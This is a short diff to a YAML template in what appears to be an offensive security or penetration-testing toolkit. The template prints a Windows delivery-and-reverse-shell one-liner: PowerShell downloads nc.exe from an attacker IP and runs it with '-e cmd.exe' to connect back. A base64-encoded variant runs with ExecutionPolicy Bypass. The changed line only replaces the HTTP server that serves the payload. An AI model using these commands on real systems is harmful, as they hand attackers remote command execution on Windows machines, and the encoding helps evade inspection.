--- a/src/profi/templates/scripts/deliver-windows-revshell-nc.exe.yaml
+++ b/src/profi/templates/scripts/deliver-windows-revshell-nc.exe.yaml
@@ -17,4 +17,4 @@ content: |
   echo 'Deliver + RevShell: powershell wget -uri http://<%=$(esh variables/attacker_ip)%>:<%=$(esh variables/delivery_outbound_port)%>/nc.exe -Outfile <%=$(esh variables/delivery_path_windows)%>\nc.exe; <%=$(esh variables/delivery_path_windows)%>\nc.exe -e cmd.exe <%=$(esh variables/attacker_ip)%> <%=$(esh variables/shell_port)%>'; \
   echo 'Deliver + RevShell (encoded): powershell.exe -ExecutionPolicy Bypass -EncodedCommand <%="powershell wget -uri http://"$(esh variables/attacker_ip)":"$(esh variables/delivery_outbound_port)"/nc.exe -Outfile "$(esh variables/delivery_path_windows)"\nc.exe; "$(esh variables/delivery_path_windows)"\nc.exe -e cmd.exe "$(esh variables/attacker_ip)" "$(esh variables/shell_port) | python helper_scripts/encode.py --base64pwsh %>'; \
   echo '================================================================'; \
-  python -m http.server <%=$(esh variables/delivery_outbound_port)%> -d packstation/outbound
+   python <%=$(esh variables/templates_dir)%>/helper_scripts/startEnhancedHttpServer.py -p <%=$(esh variables/delivery_outbound_port)%> -d packstation/outbound
